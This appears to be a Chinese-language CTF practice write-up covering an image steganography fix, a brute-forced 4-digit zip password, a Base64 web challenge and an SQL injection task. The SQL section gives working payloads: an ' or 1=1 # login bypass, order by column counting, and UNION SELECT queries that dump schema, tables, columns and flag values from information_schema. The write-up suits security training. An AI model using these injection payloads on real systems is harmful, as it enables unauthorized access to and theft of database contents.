CTF练习week02

1. 大白

CTF练习week02_第1张图片
下载附件
CTF练习week02_第2张图片
发现图片不完整,应该进行了隐写
用winhex打开图片,第二行前四位为宽,后四位为高
CTF练习week02_第3张图片
图片不完整,我们修改高度将 00 00 01 00改为00 00 02 00
CTF练习week02_第4张图片
保存后,打开图片
CTF练习week02_第5张图片

2. 基础破解

CTF练习week02_第6张图片
下载附件
CTF练习week02_第7张图片
题目提示是4位数字加密,进行暴力破解,口令为2563
CTF练习week02_第8张图片
输入密码解压,打开文件
CTF练习week02_第9张图片
Base64解密
CTF练习week02_第10张图片

3. web签到题

打开网址
CTF练习week02_第11张图片
查看源代码,发现了一串字符串
CTF练习week02_第12张图片
猜测应该是Base64,解密可得flag
CTF练习week02_第13张图片

4. wb2

CTF练习week02_第14张图片
看了一下hint,本题的考查点是基本的SQL注入和表联合查询

1.用万能密码 ’ or 1=1 #,登陆成功
CTF练习week02_第15张图片
2.判断列数
order by 3 页面回显正常,order by 4无回显

username=ctfshow' order by 3 #&password=123456
username=ctfshow' order by 4 #&password=123456

接下来的步骤就是爆库,爆表,爆字段,爆值
3.爆库名

username=ctfshow' union select 1 ,database(),3 #&password= 123456

CTF练习week02_第16张图片
4.爆表

username=ctfshow' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() #&password=123456

CTF练习week02_第17张图片
5.爆字段

username=ctfshow' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flag'#&password=123456

CTF练习week02_第18张图片
6.爆值

username=ctfshow' union select 1,group_concat(flag),3 from flag #&password=123456

CTF练习week02_第19张图片

table_schema:数据库名
table_name: 具体的表名
column_name: 列名
information_schema.schemata:包含所有数据库的名
information_schema.tables:包含所有库的表名
information_schema.columns:包含所有表的字段
group_concat()函数功能:将group by产生的同一个分组中的值连接起来,返回一个字符串结果。

你可能感兴趣的:(CTF)